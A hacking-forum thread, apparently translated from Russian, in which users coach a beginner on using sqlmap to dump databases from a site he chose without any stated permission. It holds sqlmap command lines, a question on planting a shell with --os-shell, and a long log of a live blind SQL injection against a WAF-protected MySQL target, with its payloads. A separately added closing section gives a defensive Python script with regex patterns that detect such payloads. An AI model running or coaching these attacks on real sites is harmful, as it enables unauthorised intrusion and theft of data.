29.03.2018, 21:26
Guest
Posts: n/a
Time spent on forum: 695
Reputation: 0

Hello, I decided to get into dumping databases, picked a site to practice on, scanned it with Acunetix, and here is what I got.
Spoiler: Screenshot

I want to work the vulnerability with sqlmap; what should I enter in sqlmap? Do I paste the link with the SQL injection?
Here is what's in the link
Spoiler: Screenshot

I translated it from Java and got: "No places in the matrix were found for the query"
I'm thinking of entering this in sqlmap:
Code:
sqlmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3
Is that right or not, and does anything need to be added?

29.03.2018, 21:37
Guest
Posts: n/a
Time spent on forum: 238786
Reputation: 40

Mafter said:
> Hello, I decided to get into dumping databases, picked a site to practice on, scanned it with Acunetix, and here is what I got.
> Spoiler: Screenshot
>
> I want to work the vulnerability with sqlmap; what should I enter in sqlmap? Do I paste the link with the SQL injection?
> Here is what's in the link
> Spoiler: Screenshot
>
> I translated it from Java and got: "No places in the matrix were found for the query"
> I'm thinking of entering this in sqlmap:
> Code:
> sqlmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3
> Is that right or not, and does anything need to be added?

No, that's not right.
sqlmap -u site --data='what is sent via the POST method goes here'; for that you need to click on place_name->variant 1, all the necessary parameters will be there

29.03.2018, 23:18
Guest
Posts: n/a
Time spent on forum: 104689
Reputation: 1

Mafter said:
> Hello, I decided to get into dumping databases, picked a site to practice on, scanned it with Acunetix, and here is what I got.
> Spoiler: Screenshot
>
> I want to work the vulnerability with sqlmap; what should I enter in sqlmap? Do I paste the link with the SQL injection?
> Here is what's in the link
> Spoiler: Screenshot
>
> I translated it from Java and got: "No places in the matrix were found for the query"
> I'm thinking of entering this in sqlmap:
> Code:
> sqlmap.py -u https://уязвимая_ссылка --random-agent --level=5 --risk=3 --threads=3
> Is that right or not, and does anything need to be added?

You have 2 mistakes
1. It's the POST method there; you need to specify the vulnerable parameter that is in the POST, --data="POST parameter goes here"
2. You didn't add --dbs
3. (tip) With Acunetix, better check Blind SQL injection; sqlmap cracks that quickly (that's how it is for me personally)

30.03.2018, 00:50
Guest
Posts: n/a
Time spent on forum: 759330
Reputation: 147

Sensoft said:
> sqlmap cracks that quickly (that's how it is for me personally)

what a lie ...

30.03.2018, 00:52
Guest
Posts: n/a
Time spent on forum: 104689
Reputation: 1

ms13 said:
> what a lie ...

For me sqlmap cracks this type of hole quickly

30.03.2018, 00:57
Guest
Posts: n/a
Time spent on forum: 759330
Reputation: 147

Sensoft said:
> For me sqlmap cracks this type of hole quickly

Wow, so you did hack that ICO corporation after all?

30.03.2018, 20:30
Guest
Posts: n/a
Time spent on forum: 695
Reputation: 0

Sensoft said:
> You have 2 mistakes
> 1. It's the POST method there; you need to specify the vulnerable parameter that is in the POST, --data="POST parameter goes here"
> 2. You didn't add --dbs
> 3. (tip) With Acunetix, better check Blind SQL injection; sqlmap cracks that quickly (that's how it is for me personally)

And what if Blind SQL injection shows the same thing as SQL injection?? That is, the links are identical

02.04.2018, 19:41
Newbie
Registered: 26.08.2009
Posts: 8
Time spent on forum: 375363
Reputation: 16

How do I upload a shell via sqlmap?
--os-shell and brute-force the local paths?

03.04.2018, 10:37
Guest
Posts: n/a
Time spent on forum: 35643
Reputation: 3

You were answered in the neighboring thread: the user you are running as doesn't have enough privileges for that!

16.04.2018, 01:01
Regular
Registered: 20.01.2010
Posts: 338
Time spent on forum: 500264
Reputation: 69

Any advice on how to deal with this? I'm trying to get the tables and it returns a 406 error
Code:
sqlmap.py -r 1.txt --level=1 --risk=1 --banner -v 3 --union-cols=1-66 --dbms="MySQL" --technique=EBU --identify-waf --no-cast -D database --tables
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.2.4.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 01:56:40
[01:56:40] [INFO] parsing HTTP request from '1.txt'
[01:56:40] [DEBUG] not a valid WebScarab log data
[01:56:40] [DEBUG] cleaning up configuration parameters
[01:56:40] [DEBUG] loading WAF script '360'
[01:56:40] [DEBUG] loading WAF script 'airlock'
[01:56:40] [DEBUG] loading WAF script 'anquanbao'
[01:56:40] [DEBUG] loading WAF script 'armor'
[01:56:40] [DEBUG] loading WAF script 'asm'
[01:56:40] [DEBUG] loading WAF script 'aws'
[01:56:40] [DEBUG] loading WAF script 'baidu'
[01:56:40] [DEBUG] loading WAF script 'barracuda'
[01:56:40] [DEBUG] loading WAF script 'bigip'
[01:56:40] [DEBUG] loading WAF script 'binarysec'
[01:56:40] [DEBUG] loading WAF script 'blockdos'
[01:56:40] [DEBUG] loading WAF script 'ciscoacexml'
[01:56:40] [DEBUG] loading WAF script 'cloudflare'
[01:56:40] [DEBUG] loading WAF script 'cloudfront'
[01:56:40] [DEBUG] loading WAF script 'comodo'
[01:56:40] [DEBUG] loading WAF script 'datapower'
[01:56:40] [DEBUG] loading WAF script 'denyall'
[01:56:40] [DEBUG] loading WAF script 'dosarrest'
[01:56:40] [DEBUG] loading WAF script 'dotdefender'
[01:56:40] [DEBUG] loading WAF script 'edgecast'
[01:56:40] [DEBUG] loading WAF script 'expressionengine'
[01:56:40] [DEBUG] loading WAF script 'fortiweb'
[01:56:40] [DEBUG] loading WAF script 'generic'
[01:56:40] [DEBUG] loading WAF script 'hyperguard'
[01:56:40] [DEBUG] loading WAF script 'incapsula'
[01:56:40] [DEBUG] loading WAF script 'isaserver'
[01:56:40] [DEBUG] loading WAF script 'jiasule'
[01:56:40] [DEBUG] loading WAF script 'knownsec'
[01:56:40] [DEBUG] loading WAF script 'kona'
[01:56:40] [DEBUG] loading WAF script 'modsecurity'
[01:56:40] [DEBUG] loading WAF script 'naxsi'
[01:56:40] [DEBUG] loading WAF script 'netcontinuum'
[01:56:40] [DEBUG] loading WAF script 'netscaler'
[01:56:40] [DEBUG] loading WAF script 'newdefend'
[01:56:40] [DEBUG] loading WAF script 'nsfocus'
[01:56:40] [DEBUG] loading WAF script 'paloalto'
[01:56:40] [DEBUG] loading WAF script 'profense'
[01:56:40] [DEBUG] loading WAF script 'proventia'
[01:56:40] [DEBUG] loading WAF script 'radware'
[01:56:40] [DEBUG] loading WAF script 'requestvalidationmode'
[01:56:40] [DEBUG] loading WAF script 'safe3'
[01:56:40] [DEBUG] loading WAF script 'safedog'
[01:56:40] [DEBUG] loading WAF script 'secureiis'
[01:56:40] [DEBUG] loading WAF script 'senginx'
[01:56:40] [DEBUG] loading WAF script 'sitelock'
[01:56:40] [DEBUG] loading WAF script 'sonicwall'
[01:56:40] [DEBUG] loading WAF script 'sophos'
[01:56:40] [DEBUG] loading WAF script 'stingray'
[01:56:40] [DEBUG] loading WAF script 'sucuri'
[01:56:40] [DEBUG] loading WAF script 'tencent'
[01:56:40] [DEBUG] loading WAF script 'teros'
[01:56:40] [DEBUG] loading WAF script 'trafficshield'
[01:56:40] [DEBUG] loading WAF script 'urlscan'
[01:56:40] [DEBUG] loading WAF script 'uspses'
[01:56:40] [DEBUG] loading WAF script 'varnish'
[01:56:40] [DEBUG] loading WAF script 'wallarm'
[01:56:40] [DEBUG] loading WAF script 'watchguard'
[01:56:40] [DEBUG] loading WAF script 'webappsecure'
[01:56:40] [DEBUG] loading WAF script 'webknight'
[01:56:40] [DEBUG] loading WAF script 'wordfence'
[01:56:40] [DEBUG] loading WAF script 'yundun'
[01:56:40] [DEBUG] loading WAF script 'yunsuo'
[01:56:40] [DEBUG] loading WAF script 'zenedge'
[01:56:40] [DEBUG] setting the HTTP timeout
[01:56:40] [DEBUG] creating HTTP requests opener object
[01:56:40] [DEBUG] forcing back-end DBMS to user defined value
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q] y
[01:56:41] [DEBUG] resolving hostname 'url'
[01:56:41] [INFO] testing connection to the target URL
[01:56:41] [DEBUG] declared web page charset 'utf-8'
[01:56:41] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
[01:56:41] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[01:56:41] [DEBUG] checking for WAF/IPS/IDS product '360 Web Application Firewall (360)'
[01:56:41] [DEBUG] declared web page charset 'iso-8859-1'
[01:56:41] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Airlock (Phion/Ergon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Anquanbao Web Application Firewall (Anquanbao)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Armor Protection (Armor Defense)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Application Security Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Amazon Web Services Web Application Firewall (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Yunjiasu Web Application Firewall (Baidu)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BIG-IP Application Security Manager (F5 Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BinarySEC Web Application Firewall (BinarySEC)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'BlockDoS'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Cisco ACE XML Gateway (Cisco Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFlare Web Application Firewall (CloudFlare)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudFront (Amazon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Comodo Web Application Firewall (Comodo)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'IBM WebSphere DataPower (IBM)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Deny All Web Application Firewall (DenyAll)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'DOSarrest (DOSarrest Internet Security)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'dotDefender (Applicure Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'EdgeCast WAF (Verizon)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ExpressionEngine (EllisLab)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'FortiWeb Web Application Firewall (Fortinet)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Hyperguard Web Application Firewall (art of defence)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ISA Server (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Jiasule Web Application Firewall (Jiasule)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KS-WAF (Knownsec)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'KONA Security Solutions (Akamai Technologies)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NAXSI (NBS System)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NetScaler (Citrix Systems)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Newdefend Web Application Firewall (Newdefend)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'NSFOCUS Web Application Firewall (NSFOCUS)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Palo Alto Firewall (Palo Alto Networks)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Profense Web Application Firewall (Armorlogic)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Proventia Web Application Security (IBM)'
[01:56:42] [DEBUG] page not found (404)
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'AppWall (Radware)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'ASP.NET RequestValidationMode (Microsoft)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safe3 Web Application Firewall'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Safedog Web Application Firewall (Safedog)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SecureIIS Web Server Security (BeyondTrust)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SEnginx (Neusoft Corporation)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'TrueShield Web Application Firewall (SiteLock)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'SonicWALL (Dell)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'UTM Web Protection (Sophos)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Stingray Application Firewall (Riverbed / Brocade)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'CloudProxy WebSite Firewall (Sucuri)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Tencent Cloud Web Application Firewall (Tencent Cloud Computing)'
[01:56:42] [DEBUG] checking for WAF/IPS/IDS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'TrafficShield (F5 Networks)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'UrlScan (Microsoft)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'USP Secure Entry Server (United Security Providers)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Varnish FireWall (OWASP)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wallarm Web Application Firewall (Wallarm)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WatchGuard (WatchGuard Technologies)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'webApp.secure (webScurity)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'WebKnight Application Firewall (AQTRONIX)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Wordfence (Feedjit)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yundun Web Application Firewall (Yundun)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Yunsuo Web Application Firewall (Yunsuo)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Zenedge Web Application Firewall (Zenedge)'
[01:56:43] [DEBUG] checking for WAF/IPS/IDS product 'Generic (Unknown)'
[01:56:43] [CRITICAL] WAF/IPS/IDS identified as 'Generic (Unknown)'
[01:56:43] [WARNING] WAF/IPS/IDS specific response can be found in 'c:\users\artem\appdata\local\temp\sqlmapuumtkb12408\sqlmapresponse-opc2v1'. If you know the details on used protection please report it along with specific response to 'dev@sqlmap.org'
are you sure that you want to continue with further target testing? [y/N] y
[01:56:44] [WARNING] please consider usage of tamper scripts (option '--tamper')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EmailAddress=1' AND 3169=3169 AND 'pwZw'='pwZw
Vector: AND [INFERENCE]
---
[01:56:44] [INFO] testing MySQL
[01:56:44] [DEBUG] resuming configuration option 'code' (200)
[01:56:44] [INFO] confirming MySQL
[01:56:44] [INFO] the back-end DBMS is MySQL
[01:56:44] [INFO] fetching banner
[01:56:44] [INFO] resumed: 5.6.39-cll-lve
[01:56:44] [DEBUG] performed 0 queries in 0.00 seconds
web application technology: Apache, PHP 7.1.14
back-end DBMS: MySQL >= 5.0.0
banner: '5.6.39-cll-lve'
[01:56:44] [INFO] fetching tables for database: 'database'
[01:56:44] [INFO] fetching number of tables for database 'database'
[01:56:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>51 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [WARNING] unexpected HTTP code '406' detected. Will use (extra) validation step in similar cases
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>48 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [PAYLOAD] 1' AND ORD(MID((SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x6c617265636f696e5f616c6c5f7573657273),1,1))>9 AND 'tjzX'='tjzX
[01:56:44] [DEBUG] got HTTP error code: 406 (Not Acceptable)
[01:56:44] [INFO] retrieved:
[01:56:44] [DEBUG] performed 3 queries in 0.51 seconds
[01:56:44] [WARNING] unable to retrieve the number of tables for database 'database'
[01:56:44] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
No tables found
[01:56:46] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times, 406 (Not Acceptable) - 6 times
[01:56:46] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
[01:56:46] [INFO] fetched data logged to text files under 'C:\Users\user\.sqlmap\output\url'
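
Seen from the defended side, the log above shows the filter answering the INFORMATION_SCHEMA probes with 406 while the boolean-based injection point in EmailAddress had already been confirmed in an earlier session. The following is an added example, not part of the original post: a Python triage over a constructed request log (the record format, client addresses and function names are assumptions) that flags clients sending such payloads and separates blocked requests from ones that were answered normally.

```python
import re
from collections import defaultdict
from urllib.parse import quote_plus, unquote_plus

# Request shapes visible in the posted log: schema enumeration, per-character
# inference, and the numeric tautology of a boolean-based blind test.
SIGNATURES = {
    "schema_enumeration": re.compile(r"information_schema\.", re.I),
    "char_inference": re.compile(
        r"\b(?:ord|ascii)\s*\(\s*(?:mid|substr(?:ing)?)\s*\(", re.I),
    "numeric_tautology": re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I),
}

def record(ts, client, status, value):
    """Build one constructed record: 'time client status urlencoded-POST-body'."""
    return f"{ts} {client} {status} EmailAddress={quote_plus(value)}"

# Constructed sample (not taken from the thread); addresses are documentation ranges.
PROBE = ("1' AND ORD(MID((SELECT COUNT(table_name) FROM "
         "INFORMATION_SCHEMA.TABLES),1,1))>{n} AND 'x'='x")
SAMPLE_LOG = "\n".join([
    record("01:56:40", "203.0.113.7", 200, "bob@example.test"),
    record("01:56:41", "198.51.100.9", 200, "1' AND 3169=3169 AND 'pwZw'='pwZw"),
    record("01:56:44", "198.51.100.9", 406, PROBE.format(n=51)),
    record("01:56:44", "198.51.100.9", 406, PROBE.format(n=48)),
    record("01:56:44", "198.51.100.9", 406, PROBE.format(n=9)),
    record("01:56:45", "203.0.113.8", 406, "rock and roll@example.test"),
])

def analyse(log_text):
    """Per client: matched signature names, blocked (>=400) and passed counts."""
    stats = defaultdict(lambda: {"signatures": set(), "blocked": 0, "passed": 0})
    for line in log_text.splitlines():
        _ts, client, status, body = line.split(None, 3)
        decoded = unquote_plus(body)
        matched = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
        if not matched:
            continue  # benign request, even if it was rejected for another reason
        entry = stats[client]
        entry["signatures"] |= matched
        entry["blocked" if int(status) >= 400 else "passed"] += 1
    return dict(stats)

def clients_with_unblocked_payloads(log_text):
    """Clients whose injection-shaped request was answered normally at least once."""
    return sorted(c for c, e in analyse(log_text).items() if e["passed"])

if __name__ == "__main__":
    for client, entry in analyse(SAMPLE_LOG).items():
        print(client, sorted(entry["signatures"]), entry["blocked"], entry["passed"])
```

A non-zero passed count means the filter did not stop every injection-shaped request, so the query handling for that parameter needs a code fix (bound parameters) rather than another filter rule.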